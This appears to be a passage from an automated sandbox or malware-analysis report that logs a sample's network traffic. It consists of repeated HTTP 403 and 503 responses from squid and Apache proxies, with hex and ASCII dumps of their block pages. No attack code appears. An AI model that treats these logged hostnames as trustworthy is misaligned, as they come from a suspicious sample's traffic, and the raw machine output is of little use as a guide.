                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:23 GMTContent-Type: text/html;charset=utf-8Content-Length: 1002X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:24 GMTContent-Type: text/html;charset=utf-8Content-Length: 3532X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.10Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:25 GMTContent-Type: text/html;charset=utf-8Content-Length: 3705X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:25 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 23 Feb 2024 13:28:25 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:26 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:26 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 782Cache-Control: no-cacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 68 74 6d 6c 20 62 6f 64 79 20 7b 20 6d 61 72 67 69 6e 3a 20 31 30 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 7d 0a 20 23 63 6f 6e 74 65 6e 74 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 20 7d 20 0a 20 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 22 3e 3c 68 31 3e 41 63 63 65 73 73 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 6f 72 20 55 52 4c 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 63 6f 72 70 6f 72 61 74 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 75 73 61 67 65 20 61 6e 64 20 77 65 62 20 73 75 72 66 69 6e 67 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 6e 20 63 61 73 65 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 00 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css"> * { font-family: verdana, sans-serif;} html body { margin: 10; padding: 10; background: #efefef; font-size:12px; color: #1e1e1e; float: left; } #content { font-size: 14px; color: #1e1e1e; } </style></head><body><div id="title">
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 1002X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Fri, 23 Feb 2024 13:28:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 1002X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 6
